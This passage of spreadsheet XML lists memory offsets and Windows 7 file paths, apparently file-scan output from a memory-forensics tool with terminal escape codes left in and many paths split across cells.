    <t>\Windows\System32\wdi\perftrack\Core-Fundamentals-ClientPerformance-Perftrack.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76b2c0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\en-US\netserv.inf_loc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76b788</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\DhcpClientDll.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76d2d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\WUClient-SelfUpdate-Aux-TopLe</t>
  </si>
  <si>
    <t>vel~31bf3856a</t>
  </si>
  <si>
    <t>~~7.6.</t>
  </si>
  <si>
    <t>7600.256.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76d410</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\WUClient-SelfUpdate-Core-Core</t>
  </si>
  <si>
    <t>Comp~31bf3856</t>
  </si>
  <si>
    <t>S~7.6.7600.256.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76d5e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\WUClient-SelfUpdate-Aux-MiniL</t>
  </si>
  <si>
    <t>P~31bf3856ad3</t>
  </si>
  <si>
    <t>n-US~7</t>
  </si>
  <si>
    <t>.6.7600.256.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76d900</t>
  </si>
  <si>
    <t>~7.6.7</t>
  </si>
  <si>
    <t>600.256.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76da40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\WUClient-SelfUpdate-Aux~31bf3</t>
  </si>
  <si>
    <t>.256.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76de20</t>
  </si>
  <si>
    <t>86~~7.6.760</t>
  </si>
  <si>
    <t>0.256.</t>
  </si>
  <si>
    <t>0xdf76e320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\WUClient-SelfUpdate-Core-TopL</t>
  </si>
  <si>
    <t>evel~31bf3856</t>
  </si>
  <si>
    <t>6~~7.6</t>
  </si>
  <si>
    <t>.7600.256.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76e638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\WUClient-SelfUpdate-Core-Mini</t>
  </si>
  <si>
    <t>LP~31bf3856ad</t>
  </si>
  <si>
    <t>0xdf76e778</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\WUClient-SelfUpdate-Core-UICo</t>
  </si>
  <si>
    <t>0xdf76e950</t>
  </si>
  <si>
    <t>0xdf76ec68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\WUClient-SelfUpdate-Core-AdmC</t>
  </si>
  <si>
    <t>omp~31bf3856a</t>
  </si>
  <si>
    <t>0xdf76ef80</t>
  </si>
  <si>
    <t>~7.6.7600.256.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76f268</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\RDPENCDD.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76f440</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\watchdog.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76f8f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\WUClient-SelfUpdate-Core~31bf</t>
  </si>
  <si>
    <t>x86~~7.6.76</t>
  </si>
  <si>
    <t>00.256</t>
  </si>
  <si>
    <t>.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76fa30</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\RDPCDD.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76fc08</t>
  </si>
  <si>
    <t>.6.760</t>
  </si>
  <si>
    <t>0.256.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76ff80</t>
  </si>
  <si>
    <t>0xdf7701b0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\RDPREFMP.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf771a30</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\msfs.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf771c38</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\tdx.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf772128</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\npfs.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7739a0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\tdi.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7742e0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\wanarp.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf77d848</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\afd.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf77f288</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\pacer.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf780228</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\netbios.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf780698</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\VBoxSF.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf782238</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\termdd.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf782f80</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\wfplwf.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf783588</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\i8042prt.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf783f08</t>
  </si>
  <si>
    <t>\Windows\System32\apisetschema.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf795c60</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\mssmbios.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf795dd0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\rdbss.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7973a0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\nsiproxy.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf797f80</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\discache.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf79a838</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\dfsc.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7a0f80</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\csc.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7a2ba0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\blbdrive.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7a35f8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\tunnel.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7a3b88</t>
  </si>
  <si>
    <t>\ProtectedPrefix_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7a3f80</t>
  </si>
  <si>
    <t>0xdf7a4358</t>
  </si>
  <si>
    <t>\Program Files\Windows Defender\MsMpRes.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7a4be8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Disk Cleanup.lnk_x001B_[</t>
  </si>
  <si>
    <t>0xdf7a4d90</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_pla_reports_a2604845b2b380ca.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7a56f0</t>
  </si>
  <si>
    <t>\Windows\System32\wups2.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7a5a90</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netbxndx.inf_x86_neutral_94ba965704caa228\netbxnd</t>
  </si>
  <si>
    <t>x.inf_x001B_[0K_x001B_[44</t>
  </si>
  <si>
    <t>0xdf7a5c10</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\eudcedit.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7a5d90</t>
  </si>
  <si>
    <t>0xdf7a62c8</t>
  </si>
  <si>
    <t>\Windows\System32\wscproxystub.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7a63c0</t>
  </si>
  <si>
    <t>0xdf7a64f8</t>
  </si>
  <si>
    <t>\Windows\System32\wscisvif.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7a6b90</t>
  </si>
  <si>
    <t>0xdf7a6c98</t>
  </si>
  <si>
    <t>0xdf7a6f80</t>
  </si>
  <si>
    <t>0xdf7a7038</t>
  </si>
  <si>
    <t>0xdf7a71c0</t>
  </si>
  <si>
    <t>0xdf7a7670</t>
  </si>
  <si>
    <t>0xdf7ac5d8</t>
  </si>
  <si>
    <t>0xdf7acf80</t>
  </si>
  <si>
    <t>0xdf7af8b0</t>
  </si>
  <si>
    <t>\Windows\System32\autochk.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7afac8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\VBoxMouse.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7b0218</t>
  </si>
  <si>
    <t>0xdf7b29a8</t>
  </si>
  <si>
    <t>\Windows\System32\config\SOFTWARE.LOG1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7b2c60</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\mouclass.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7b2f80</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\kbdclass.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7b44f0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\portcls.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7b4ac8</t>
  </si>
  <si>
    <t>0xdf7b4e80</t>
  </si>
  <si>
    <t>\Windows\System32\imagehlp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7b5198</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\VBoxVideo.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7b5f80</t>
  </si>
  <si>
    <t>\Windows\Fonts\angsa.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7b6e48</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\E1G60I32.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7c8178</t>
  </si>
  <si>
    <t>\Windows\Fonts\simhei.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7c8390</t>
  </si>
  <si>
    <t>0xdf7c86c8</t>
  </si>
  <si>
    <t>\Windows\System32\config\SOFTWARE.LOG2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7c8780</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FC5A820A001B41D68902E051F3</t>
  </si>
  <si>
    <t>6A5282_CF2CEC</t>
  </si>
  <si>
    <t>1EEF5DFFF23</t>
  </si>
  <si>
    <t>8E2E15</t>
  </si>
  <si>
    <t>E8F2A2748_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7cd2e0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\drmk.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7ce450</t>
  </si>
  <si>
    <t>\Windows\System32\fwcfg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7cf0f0</t>
  </si>
  <si>
    <t>\Windows\System32\rdpcorekmts.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7cf488</t>
  </si>
  <si>
    <t>\Windows\System32\config\RegBack\SYSTEM_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7cf698</t>
  </si>
  <si>
    <t>\Windows\System32\config\SYSTEM.LOG1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7d1a50</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\raspppoe.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7d1e08</t>
  </si>
  <si>
    <t>0xdf7d2290</t>
  </si>
  <si>
    <t>0xdf7d2598</t>
  </si>
  <si>
    <t>0xdf7d2988</t>
  </si>
  <si>
    <t>0xdf7d2b08</t>
  </si>
  <si>
    <t>\Boot\BCD_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7d2dc8</t>
  </si>
  <si>
    <t>0xdf7d3028</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\ndiswan.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7d4398</t>
  </si>
  <si>
    <t>0xdf7d4eb8</t>
  </si>
  <si>
    <t>\Windows\System32\kernel32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7d51d8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\raspptp.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7d7ed8</t>
  </si>
  <si>
    <t>0xdf7d7f80</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\ks.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7d8760</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\rdpbus.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7d8948</t>
  </si>
  <si>
    <t>0xdf7d8d90</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\rassstp.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7da038</t>
  </si>
  <si>
    <t>0xdf7da338</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\swenum.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7db390</t>
  </si>
  <si>
    <t>0xdf7dce08</t>
  </si>
  <si>
    <t>\Boot\BCD.LOG_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7e0038</t>
  </si>
  <si>
    <t>0xdf7f33e0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\ndistapi.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7f38b8</t>
  </si>
  <si>
    <t>0xdf7f66c0</t>
  </si>
  <si>
    <t>0xdf7f7038</t>
  </si>
  <si>
    <t>\Windows\System32\ws2_32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7f94a0</t>
  </si>
  <si>
    <t>\Windows\System32\profapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7f9758</t>
  </si>
  <si>
    <t>\Windows\System32\comctl32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7f9cc8</t>
  </si>
  <si>
    <t>0xdf7fa6f8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\igdlh.inf_x86_neutral_2d255f193700d214\igdlh.inf_x001B_</t>
  </si>
  <si>
    <t>0xdf7fa948</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.net_clr_networking_0000_417aaafa90927065.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7fac68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_msdtc_0409_5b1b92d34f36ae69.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7fb588</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.netframework_0409_fd6b70814927192f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7fc038</t>
  </si>
  <si>
    <t>0xdf7fc168</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB4483458~31bf3856ad364e35~x86~~6.1.1.1.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7fc738</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_msdtc_0ef70686e1d9b30c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7fcd70</t>
  </si>
  <si>
    <t>\Windows\System32\devinv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7fd840</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_0409_06652563df2ff0c1.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7fd9f0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_els_transliteration_1547068d18bc2738.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7fdc78</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wvmbus.inf_x86_neutral_fca91999602b0343\wvmbus.in</t>
  </si>
  <si>
    <t>0xdf7fe038</t>
  </si>
  <si>
    <t>0xdf7fecc8</t>
  </si>
  <si>
    <t>\Windows\System32\winhttp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7ff038</t>
  </si>
  <si>
    <t>0xdf7ff6f8</t>
  </si>
  <si>
    <t>wrpint.dll_x001B_</t>
  </si>
  <si>
    <t>0xdf7ffc68</t>
  </si>
  <si>
    <t>\Windows\System32\srclient.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf8b4738</t>
  </si>
  <si>
    <t>0xdf8ce8b8</t>
  </si>
  <si>
    <t>\Windows\System32\difxapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf8d3520</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\rasl2tp.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf92a1e8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\tssecsrv.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf92b038</t>
  </si>
  <si>
    <t>0xdf92b778</t>
  </si>
  <si>
    <t>0xdf92bbc8</t>
  </si>
  <si>
    <t>0xdf92c038</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\Services.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf92c240</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\StobjectInstrumentation.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf92d038</t>
  </si>
  <si>
    <t>0xdf92d240</t>
  </si>
  <si>
    <t>0xdf92d808</t>
  </si>
  <si>
    <t>0xdf92d8c0</t>
  </si>
  <si>
    <t>0xdf92d978</t>
  </si>
  <si>
    <t>0xdf92da30</t>
  </si>
  <si>
    <t>0xdf92dae8</t>
  </si>
  <si>
    <t>aAnnotations.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf92dba0</t>
  </si>
  <si>
    <t>ions.ni.dll_x001B_[0K_x001B_[143G</t>
  </si>
  <si>
    <t>0xdf92de10</t>
  </si>
  <si>
    <t>0xdf92e308</t>
  </si>
  <si>
    <t>0xdf92e5b0</t>
  </si>
  <si>
    <t>ty.ni.dll.a</t>
  </si>
  <si>
    <t>0xdf92e9c8</t>
  </si>
  <si>
    <t>0xdf92ebe8</t>
  </si>
  <si>
    <t>0xdf92eea8</t>
  </si>
  <si>
    <t>cs.ni.dll_x001B_[</t>
  </si>
  <si>
    <t>0xdf92f350</t>
  </si>
  <si>
    <t>0xdf92f7f8</t>
  </si>
  <si>
    <t>0xdf92fa98</t>
  </si>
  <si>
    <t>0xdf92fb50</t>
  </si>
  <si>
    <t>0xdf92fc08</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework.Aero\v4.0_4.0.0.0__31bf3856ad36</t>
  </si>
  <si>
    <t>o.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf92fcc0</t>
  </si>
  <si>
    <t>0xdf92fe10</t>
  </si>
  <si>
    <t>0xdf92fec8</t>
  </si>
  <si>
    <t>0xdf92ff80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework.Royale\v4.0_4.0.0.0__31bf3856ad</t>
  </si>
  <si>
    <t>364e35\Presen</t>
  </si>
  <si>
    <t>tationFrame</t>
  </si>
  <si>
    <t>work.R</t>
  </si>
  <si>
    <t>oyale.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf930038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_pl-pl_d8b7a1782ce8abbb.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf930380</t>
  </si>
  <si>
    <t>0xdf930438</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf930668</t>
  </si>
  <si>
    <t>0xdf930890</t>
  </si>
  <si>
    <t>001_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf930ab0</t>
  </si>
  <si>
    <t>b.ni.dll.aux_x001B_</t>
  </si>
  <si>
    <t>0xdf9318d8</t>
  </si>
  <si>
    <t>0xdf9325a0</t>
  </si>
  <si>
    <t>0xdf933f10</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v3.0_windows_communication_foundation_e073</t>
  </si>
  <si>
    <t>23de19ff1b52.</t>
  </si>
  <si>
    <t>0xdf934028</t>
  </si>
  <si>
    <t>0xdf934bc8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sppuinotify.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf934f18</t>
  </si>
  <si>
    <t>0xdf935730</t>
  </si>
  <si>
    <t>0xdf935e20</t>
  </si>
  <si>
    <t>0xdf93b028</t>
  </si>
  <si>
    <t>0xdf93b3e8</t>
  </si>
  <si>
    <t>0xdf93d4f8</t>
  </si>
  <si>
    <t>\Windows\System32\CodeIntegrity\bootcat.cache_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf93d5a0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\atapi.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf93d860</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\perftrack.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf93da40</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hidirkbd.inf_x86_neutral_b7b6ffb126da2654\hidirkb</t>
  </si>
  <si>
    <t>0xdf93db70</t>
  </si>
  <si>
    <t>\System Volume Information\{3808876b-c176-4e48-b7ae-04046e6cc752}_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf93f0c8</t>
  </si>
  <si>
    <t>0xdf93fa58</t>
  </si>
  <si>
    <t>0xdf941a90</t>
  </si>
  <si>
    <t>TxfLog_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf942028</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\MF\Active.GRL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9421d8</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\$Extend\$RmMetadata\$TxfLog\$TxfLog_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf942c98</t>
  </si>
  <si>
    <t>0xdf943258</t>
  </si>
  <si>
    <t>\$Extend\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000003_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9434b0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\null.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf943f10</t>
  </si>
  <si>
    <t>0xdf944390</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\crashdmp.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf944ad0</t>
  </si>
  <si>
    <t>0xdf944cd0</t>
  </si>
  <si>
    <t>\$Extend\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000002_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf944f80</t>
  </si>
  <si>
    <t>0xdf945b70</t>
  </si>
  <si>
    <t>0xdf946460</t>
  </si>
  <si>
    <t>0xdf946508</t>
  </si>
  <si>
    <t>0xdf9469b0</t>
  </si>
  <si>
    <t>\Windows\System32\CodeIntegrity\driver.stl_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf946b18</t>
  </si>
  <si>
    <t>0xdf946bc0</t>
  </si>
  <si>
    <t>\Windows\System32\ntdll.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf947618</t>
  </si>
  <si>
    <t>0xdf947ab0</t>
  </si>
  <si>
    <t>\System Volume Information\{35539352-42d2-11e9-ba55-08002710b8d0}{3808876b-c176-4e48-b7ae-0404</t>
  </si>
  <si>
    <t>0xdf947c60</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\dumpfve.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf948970</t>
  </si>
  <si>
    <t>KtmLog_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf948bc8</t>
  </si>
  <si>
    <t>0xdf97c9f8</t>
  </si>
  <si>
    <t>0xdf9ad498</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Driv</t>
  </si>
  <si>
    <t>0xdf9ad6e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Backup-Pack</t>
  </si>
  <si>
    <t>0xdf9ad828</t>
  </si>
  <si>
    <t>0xdf9ada00</t>
  </si>
  <si>
    <t>0xdf9add18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Media-Foundation-Pa</t>
  </si>
  <si>
    <t>ckage~31bf385</t>
  </si>
  <si>
    <t>6ad364e35~x</t>
  </si>
  <si>
    <t>86~~6.</t>
  </si>
  <si>
    <t>0xdf9d2138</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integ</t>
  </si>
  <si>
    <t>ration-Driver</t>
  </si>
  <si>
    <t>s-Package~3</t>
  </si>
  <si>
    <t>6ad364e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9d23e8</t>
  </si>
  <si>
    <t>6ad364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9d28a8</t>
  </si>
  <si>
    <t>86~en-</t>
  </si>
  <si>
    <t>US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9d2c48</t>
  </si>
  <si>
    <t>US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9d2d88</t>
  </si>
  <si>
    <t>0xdf9d46d8</t>
  </si>
  <si>
    <t>0xdf9d4d50</t>
  </si>
  <si>
    <t>0xdf9d5180</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-En</t>
  </si>
  <si>
    <t>terprise-Clie</t>
  </si>
  <si>
    <t>nt-Package~</t>
  </si>
  <si>
    <t>56ad364e35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9d5388</t>
  </si>
  <si>
    <t>0xdf9d5560</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-BLB-Client-</t>
  </si>
  <si>
    <t>0xdf9d5878</t>
  </si>
  <si>
    <t>0xdf9d5b90</t>
  </si>
  <si>
    <t>0xdf9d5cd0</t>
  </si>
  <si>
    <t>0xdf9d5e40</t>
  </si>
  <si>
    <t>0xdf9d61c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-BusinessSca</t>
  </si>
  <si>
    <t>nning-Feature</t>
  </si>
  <si>
    <t>0xdf9d64d8</t>
  </si>
  <si>
    <t>0xdf9d6618</t>
  </si>
  <si>
    <t>0xdf9d6950</t>
  </si>
  <si>
    <t>0xdf9d6b28</t>
  </si>
  <si>
    <t>0xdf9d6e40</t>
  </si>
  <si>
    <t>56ad364e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9d71e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Feat</t>
  </si>
  <si>
    <t>ures-Package~</t>
  </si>
  <si>
    <t>0xdf9d74f8</t>
  </si>
  <si>
    <t>0xdf9d7638</t>
  </si>
  <si>
    <t>0xdf9d7810</t>
  </si>
  <si>
    <t>0xdf9d7b28</t>
  </si>
  <si>
    <t>0xdf9d7ee8</t>
  </si>
  <si>
    <t>0xdf9d8278</t>
  </si>
  <si>
    <t>0xdf9d8da0</t>
  </si>
  <si>
    <t>0xdf9d8e58</t>
  </si>
  <si>
    <t>0xdf9d90e8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\regsvr32.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9db2d8</t>
  </si>
  <si>
    <t>\Winsock2\CatalogChangeListener-1d8-0_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf9db748</t>
  </si>
  <si>
